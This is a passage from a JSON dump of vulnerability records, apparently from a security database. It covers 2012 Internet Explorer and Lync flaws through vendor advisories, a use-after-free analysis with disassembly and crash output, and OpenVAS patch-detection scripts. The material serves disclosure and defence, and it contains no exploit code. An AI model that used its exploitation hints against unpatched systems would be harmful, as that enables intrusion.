Server 2008 for x64-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 for Itanium-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1\r\nMicrosoft Windows Vista Service Pack 1\r\nMicrosoft Windows Vista Service Pack 2\r\nMicrosoft Windows Vista x64 Edition Service Pack 1\r\nMicrosoft Windows Vista x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 Service Pack 2\r\nMicrosoft Windows Server 2003 x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 with SP2 for Itanium-based Systems\r\nMicrosoft Windows XP Service Pack 3\r\nMicrosoft Windows XP Professional x64 Edition Service Pack 2\r\n\r\n\r\nIV. Binary Analysis & Exploits/PoCs\r\n---------------------------------------\r\n\r\nIn-depth technical analysis of the vulnerability and a functional exploit\r\nincluding ASLR and DEP bypass are available through the VUPEN BAE\r\n(Binary Analysis & Exploits) portal:\r\n\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\nVUPEN Binary Analysis & Exploits Service provides private exploits and\r\nin-depth technical analysis of the most significant public vulnerabilities\r\nbased on disassembly, reverse engineering, protocol analysis, and code \r\naudit.\r\n\r\nThe service allows governments and major corporations to evaluate risks, and\r\nprotect infrastructures and assets against new threats. The service also\r\nallows security vendors (IPS, IDS, AntiVirus) to supplement their internal\r\nresearch efforts and quickly develop both vulnerability-based and\r\nexploit-based signatures to proactively protect their customers from attacks\r\nand emerging threats.\r\n\r\n\r\nV. VUPEN Threat Protection Program\r\n-----------------------------------\r\n\r\nGovernments and major corporations which are members of the VUPEN Threat\r\nProtection Program (TPP) have been proactively alerted about the \r\nvulnerability\r\nwhen it was discovered by VUPEN in advance of its public disclosure, and\r\nhave received a detailed attack detection guidance to protect national and\r\ncritical infrastructures against potential 0-day attacks exploiting this\r\nvulnerability:\r\n\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nVI. SOLUTION\r\n----------------\r\n\r\nApply MS12-037 security update.\r\n\r\n\r\nVII. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by Alexandre Pelletier of VUPEN Security\r\n\r\n\r\nVIII. ABOUT VUPEN Security\r\n---------------------------\r\n\r\nVUPEN is the leadering provider of advanced vulnerability research for\r\ndefensive and offensive cyber security. VUPEN solutions enable corporations\r\nand governments to measure and manage risks, eliminate vulnerabilities\r\nbefore they can be exploited, and protect critical infrastructures and\r\nassets against known and unknown vulnerabilities.\r\n\r\nVUPEN has been recognized as "Company of the Year 2011 in the Vulnerability\r\nResearch Market" by Frost & Sullivan.\r\n\r\nVUPEN has been recognized as "Company of the Year 2011 in the Vulnerability\r\nResearch Market" by Frost & Sullivan.\r\n\r\nVUPEN solutions include:\r\n\r\n* VUPEN Binary Analysis & Exploits Service (BAE) :\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\n* VUPEN Threat Protection Program (TPP) :\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nIX. REFERENCES\r\n----------------------\r\n\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms12-037\r\nhttp://www.vupen.com/english/research.php\r\n\r\n\r\nX. DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2012-02-02 - Vulnerability Discovered by VUPEN and used at Pwn2own\r\n2012-06-12 - Public disclosure\r\n", "cvss3": {}, "published": "2012-06-25T00:00:00", "type": "securityvulns", "title": "VUPEN Security Research - Microsoft Internet Explorer "Col" Element Remote Heap Overflow (MS12-037 / CVE-2012-1876)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2012-06-25T00:00:00", "id": "SECURITYVULNS:DOC:28204", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28204", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-093 : (Pwn2Own) Microsoft Internet Explorer Fixed Table Colspan\r\nRemote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-093\r\nJune 12, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2012-1876\r\n\r\n- -- CVSS:\r\n9, AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n\r\n- -- Affected Vendors:\r\n\r\nMicrosoft\r\n\r\n- -- Affected Products:\r\n\r\nMicrosoft Internet Explorer\r\n\r\n- -- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 12380.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Microsoft Internet Explorer. User interaction\r\nis required to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the way Internet Explorer handles\r\ndynamically changed colspans on a column in a table with the\r\ntable-layout:fixed style. If the colspan is increased after initial\r\ncreation it will result in a heap overflow. This can lead to remote code\r\nexecution under the context of the current program.\r\n\r\n- -- Vendor Response:\r\n\r\nMicrosoft has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/MS12-037.mspx\r\n\r\n\r\n- -- Disclosure Timeline:\r\n2012-03-14 - Vulnerability reported to vendor\r\n\r\n2012-06-12 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n\r\n* VUPEN Vulnerability Research Team http://www.vupen.com\r\n\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 1950)\r\nCharset: utf-8\r\n\r\nwsBVAwUBT9eb7FVtgMGTo1scAQKNTwgApmw+usQ6/yMLe/mW84cS02tPb3WWxedh\r\nYsnzwiULe1YnuuEMYrEgXPDJbZkIp9OljLd6nYSIcAgdCUxck6XvBjqQmy82J1gT\r\nCLiB2nkStM0nPV0cGmbtBdmD/l2enasbBNv46AuKVP5CcwvngBuGxyTZIij0QDrS\r\n0vdKQql8lG6roQGkcUW6yad8NKmT9zIwlp75UQxMP8WY3yr4XJ0wDPXQoHzh9A2F\r\nP8vbSQBGvd6wHPbfHogphIAYCJpczOV/3Jfj7XVgzZWVscoPC8i8q/GKXyN9J13D\r\nixmmhexOplov43549zMZ6Esl3zUW17cNBCPr06a6FHdABz4piCz1DQ==\r\n=YxaL\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2012-06-17T00:00:00", "type": "securityvulns", "title": "ZDI-12-093 : (Pwn2Own) Microsoft Internet Explorer Fixed Table Colspan Remote Code Execution Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2012-06-17T00:00:00", "id": "SECURITYVULNS:DOC:28155", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28155", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "[CAL-2012-0023]Microsoft IE Developer Toolbar Remote Code Execution\r\nVulnerability\r\n\r\n\r\nCVE ID: CVE-2012-1874\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms12-037\r\nhttp://blog.vulnhunt.com/index.php/2012/06/13/cal-2012-0023microsoft-ie-developer-toolbar-remote-code-execution-vulnerability/\r\n\r\n\r\n1 Affected Products\r\n=================\r\ntested :Internet Explorer 9.0.8112.16421\r\nalso affected IE8\r\n\r\n\r\n2 Vulnerability Details\r\n=====================\r\nCode Audit Labs http://www.vulnhunt.com has discovered a use after free\r\nvulnerability in IE developer toolbar.\r\n\r\nIE developer toolbar register a global console object, and add bulitin\r\nmembers as\r\nCFunctionPointer with reference to console object, but not add reference\r\ncount correctly.\r\nif access console object's property, it return a CFunctionPointer, so it\r\ncause a use after\r\nfree vulnerability, which can cause Remote Code Execution.\r\n\r\n\r\n\r\n3 Analysis\r\n=========\r\nasm in jsdbgui.dll\r\n\r\n.text:1000B172 ; private: void __thiscall\r\nCConsole::AddAllBuiltinMembers(void)\r\n.text:1000B172 ?AddAllBuiltinMembers@CConsole@@AAEXXZ proc near\r\n.text:1000B172 ; CODE XREF:\r\nATL::CComObject<CConsole>::CreateInstance(ATL::CComObject<CConsole> *\r\n*)+62\u0019p\r\n.text:1000B172\r\n.text:1000B172 var_10 = dword ptr -10h\r\n.text:1000B172 var_4 = dword ptr -4\r\n.text:1000B172\r\n.text:1000B172 push 4\r\n.text:1000B174 mov eax, offset loc_10039274\r\n.text:1000B179 call __EH_prolog3\r\n.text:1000B17E mov edi, ecx\r\n.text:1000B180 push 4\r\n.text:1000B182 pop esi\r\n.text:1000B183 push esi ; dwBytes\r\n.text:1000B184 call ??2@YAPAXI@Z ; operator new(uint)\r\n.text:1000B189 pop ecx\r\n.text:1000B18A mov [ebp+var_10], eax\r\n.text:1000B18D and [ebp+var_4], 0\r\n.text:1000B191 test eax, eax\r\n.text:1000B193 jz short loc_1000B1A3\r\n.text:1000B195 push offset aLog ; "log"\r\n.text:1000B19A mov ecx, eax\r\n.text:1000B19C call\r\n??0?$CStringT@GV?$StrTraitATL@GV?$ChTraitsCRT@G@ATL@@@ATL@@@ATL@@QAE@PBG@Z\r\n;\r\nATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>(ushort\r\nconst *)\r\n.text:1000B1A1 jmp short loc_1000B1A5\r\n.text:1000B1A3 ;\r\n---------------------------------------------------------------------------\r\n.text:1000B1A3\r\n.text:1000B1A3 loc_1000B1A3: ; CODE XREF:\r\nCConsole::AddAllBuiltinMembers(void)+21\u0018j\r\n.text:1000B1A3 xor eax, eax\r\n.text:1000B1A5\r\n.text:1000B1A5 loc_1000B1A5: ; CODE XREF:\r\nCConsole::AddAllBuiltinMembers(void)+2F\u0018j\r\n.text:1000B1A5 push eax\r\n.text:1000B1A6 or ebx, 0FFFFFFFFh\r\n.text:1000B1A9 push 1\r\n.text:1000B1AB mov ecx, edi\r\n.text:1000B1AD mov [ebp+var_4], ebx\r\n.text:1000B1B0 call\r\n?AddBuiltinMethod@CParentExpando@@IAEXJPAV?$CStringT@GV?$StrTraitATL@GV?$ChTraitsCRT@G@ATL@@@ATL@@@ATL@@@Z\r\n;\r\nCParentExpando::AddBuiltinMethod(long,ATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>\r\n*)\r\n.text:1000B1B5 push esi ; dwBytes\r\n\r\n.text:10021E5B push [ebp+arg_0]\r\n.text:10021E5E mov ecx, edi\r\n.text:10021E60 push esi\r\n.text:10021E61 call\r\n?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z ;\r\nCFunctionPointer::SetMethod(CParentExpando *,long)\r\n.text:10021E66 push [ebp+var_10]\r\n.text:10021E69 mov ecx, esi\r\n.text:10021E6B push [ebp+arg_0]\r\n.text:10021E6E call\r\n?SetValue@CParentExpando@@IAEJJPAUIDispatch@@@Z ;\r\nCParentExpando::SetValue(long,IDispatch *)\r\n.text:10021E73 mov eax, [ebp+var_10]\r\n\r\n.text:1001B29B ; public: void __thiscall\r\nCFunctionPointer::SetMethod(class CParentExpando *, long)\r\n.text:1001B29B ?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z\r\nproc near\r\n.text:1001B29B ; CODE XREF:\r\nCParentExpando::AddBuiltinMethod(long,ATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>\r\n*)+4A\u0019p\r\n.text:1001B29B\r\n.text:1001B29B arg_0 = dword ptr 8\r\n.text:1001B29B arg_4 = dword ptr 0Ch\r\n.text:1001B29B\r\n.text:1001B29B mov edi, edi\r\n.text:1001B29D push ebp\r\n.text:1001B29E mov ebp, esp\r\n.text:1001B2A0 mov eax, [ebp+arg_0]\r\n.text:1001B2A3 mov [ecx+8], eax\r\n.text:1001B2A6 mov eax, [ebp+arg_4]\r\n.text:1001B2A9 mov [ecx+0Ch], eax\r\n.text:1001B2AC pop ebp\r\n.text:1001B2AD retn 8\r\n.text:1001B2AD ?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z endp\r\n\r\n\r\n4 Exploitable?\r\n============\r\nif overwrite freed memory with controlled content, combined with heap\r\nspray, can cause remote code execution.\r\n\r\n\r\n5 Crash info:\r\n===============\r\nModLoad: 00110000 001c8000 C:\Program Files (x86)\Internet\r\nExplorer\iexplore.exe\r\n(1564.18e8): Access violation - code c0000005 (!!! second chance !!!)\r\neax=0a1202d0 ebx=0365cc90 ecx=0a0afc70 edx=6e1effff esi=00000000\r\nedi=0365cc48\r\neip=088b0000 esp=0365cbd8 ebp=0365cbf0 iopl=0 nv up ei pl zr na\r\npe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b\r\nefl=00010246\r\n088b0000 ?? ???\r\n0:005> kb 3\r\nChildEBP RetAddr Args to Child\r\nWARNING: Frame IP not in any known module. Following frames may be wrong.\r\n0365cbd4 6e1fb3ac 00000004 0365cc90 003a3718 0x88b0000\r\n0365cbf0 5f69e657 0a1202d0 00000000 00000001\r\njsdbgui!CFunctionPointer::InvokeEx+0xbc\r\n0365cc64 5f658fa8 0365cc90 0365cd48 00000008\r\njscript9!DispatchHelper::GetDispatchValue+0x9d\r\n\r\n\r\n6 TIMELINE:\r\n==========\r\n2012/1/15 code audit labs of vulnhunt.com discover this issue\r\n2012/1/20 we begin analyze\r\n2012/2/20 we comfirmed this is an exploitable vulnerability. report to\r\nMicrosoft\r\n2012/2/21 Microsoft reply got the report.\r\n2012/6/14 Microsoft public this bulletin.\r\n\r\n\r\n7 About Code Audit Labs:\r\n=====================\r\nCode Audit Labs secure your software,provide Professional include source\r\ncode audit and binary code audit service.\r\nCode Audit Labs:" You create value for customer,We protect your value"\r\nhttp://www.VulnHunt.com\r\nhttp://blog.Vulnhunt.com\r\nhttp://t.qq.com/vulnhunt\r\nhttp://weibo.com/vulnhunt\r\nhttps://twitter.com/vulnhunt\r\n", "cvss3": {}, "published": "2012-06-17T00:00:00", "type": "securityvulns", "title": "[CAL-2012-0023]Microsoft IE Developer Toolbar Remote Code Execution Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1874"], "modified": "2012-06-17T00:00:00", "id": "SECURITYVULNS:DOC:28157", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28157", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:02:41", "description": "Font parsing vulnerabilities, unsafe DLL loading, crossite scripting.", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "securityvulns", "title": "Mictosoft Lync multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1858", "CVE-2011-3402", "CVE-2012-0159", "CVE-2012-1849"], "modified": "2012-06-13T00:00:00", "id": "SECURITYVULNS:VULN:12406", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12406", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:47", "description": "Crossite scripting, URL redirection.", "cvss3": {}, "published": "2012-07-11T00:00:00", "type": "securityvulns", "title": "Microsoft Sharepoint multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1862", "CVE-2012-1858", "CVE-2012-1863", "CVE-2012-1861", "CVE-2012-1860", "CVE-2012-1859"], "modified": "2012-07-11T00:00:00", "id": "SECURITYVULNS:VULN:12466", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12466", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-20T08:50:17", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (2699988)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "modified": "2017-07-05T00:00:00", "id": "OPENVAS:902682", "href": "http://plugins.openvas.org/nasl.php?oid=902682", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms12-037.nasl 6526 2017-07-05 05:43:52Z cfischer $\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to gain sensitive\n information or execute arbitrary code in the context of the application.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x\";\ntag_insight = \"Multiple vulnerabilities are due to the way that Internet Explorer,\n - Handles content using specific strings when sanitizing HTML.\n - Handles EUC-JP character encoding.\n - Processes NULL bytes, which allows to disclose content from the process\n memory.\n - Accesses an object that has been deleted, which allows to corrupt memory\n using Internet Explorer Developer Toolbar.\n - Accesses an object that does not exist, when handling the 'Col' element.\n - Accesses an object that has been deleted, when handling Same ID Property,\n 'Title' element, 'OnBeforeDeactivate' event, 'insertRow' method and\n 'OnRowsInserted' event allows to corrupt memory.\n - Accesses an undefined memory location, when handling the\n 'insertAdjacentText' method allows to corrupt memory.\n - Handles 'Scrolling' event.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms12-037\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.\";\n\nif(description)\n{\n script_id(902682);\n script_version(\"$Revision: 6526 $\");\n script_cve_id(\"CVE-2012-1523\", \"CVE-2012-1858\", \"CVE-2012-1872\", \"CVE-2012-1873\",\n \"CVE-2012-1874\", \"CVE-2012-1875\", \"CVE-2012-1876\", \"CVE-2012-1877\",\n \"CVE-2012-1878\", \"CVE-2012-1879\", \"CVE-2012-1880\", \"CVE-2012-1881\",\n \"CVE-2012-1882\");\n script_bugtraq_id(53841, 53842, 53843, 53844, 53845, 53847, 53848, 53866,\n 53867, 53868, 53869, 53870, 53871);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 07:43:52 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-13 09:16:32 +0530 (Wed, 13 Jun 2012)\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_mandatory_keys(\"MS/IE/Version\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49412/\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2699988\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1027147\");\n script_xref(name : \"URL\" , value : \"http://www.securelist.com/en/advisories/49412\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-037\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\nieVer = \"\";\ndllVer = NULL;\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## Get IE Version from KB\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || !(ieVer =~ \"^(6|7|8|9)\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\n## Get Version from Mshtml.dll\ndllVer = fetch_file_version(sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"6.0.2900.0000\", test_version2:\"6.0.2900.6211\")||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"6.0.3790.0000\", test_version2:\"6.0.3790.4985\") ||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18615\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22837\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19271\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23358\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17005\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21197\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.17823\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.21975\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-14T10:50:56", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-039.", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "openvas", "title": "Microsoft Lync Remote Code Execution Vulnerabilities (2707956)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1858", "CVE-2011-3402", "CVE-2012-0159", "CVE-2012-1849"], "modified": "2017-06-29T00:00:00", "id": "OPENVAS:902842", "href": "http://plugins.openvas.org/nasl.php?oid=902842", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms12-039.nasl 6473 2017-06-29 06:07:30Z cfischer $\n#\n# Microsoft Lync Remote Code Execution Vulnerabilities (2707956)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code\n with kernel-level privileges. Failed exploit attempts may result in a\n denial of service condition.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Lync 2010\n Microsoft Lync 2010 Attendee\n Microsoft Lync 2010 Attendant\n Microsoft Communicator 2007 R2\";\ntag_insight = \"- An error within the Win32k kernel-mode driver (win32k.sys) when parsing\n TrueType fonts.\n - An error in the t2embed.dll module when parsing TrueType fonts.\n - The client loads libraries in an insecure manner, which can be exploited\n to load arbitrary libraries by tricking a user into opening a '.ocsmeet'\n file located on a remote WebDAV or SMB share.\n - An unspecified error in the 'SafeHTML' API when sanitising HTML code can\n be exploited to execute arbitrary HTML and script code in the user's chat\n session.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms12-039\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS12-039.\";\n\nif(description)\n{\n script_id(902842);\n script_version(\"$Revision: 6473 $\");\n script_bugtraq_id(50462, 53335, 53831, 53833);\n script_cve_id(\"CVE-2011-3402\", \"CVE-2012-0159\", \"CVE-2012-1849\", \"CVE-2012-1858\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-06-29 08:07:30 +0200 (Thu, 29 Jun 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-13 11:11:11 +0530 (Wed, 13 Jun 2012)\");\n script_name(\"Microsoft Lync Remote Code Execution Vulnerabilities (2707956)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/48429\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1027150\");\n script_xref(name : \"URL\" , value : 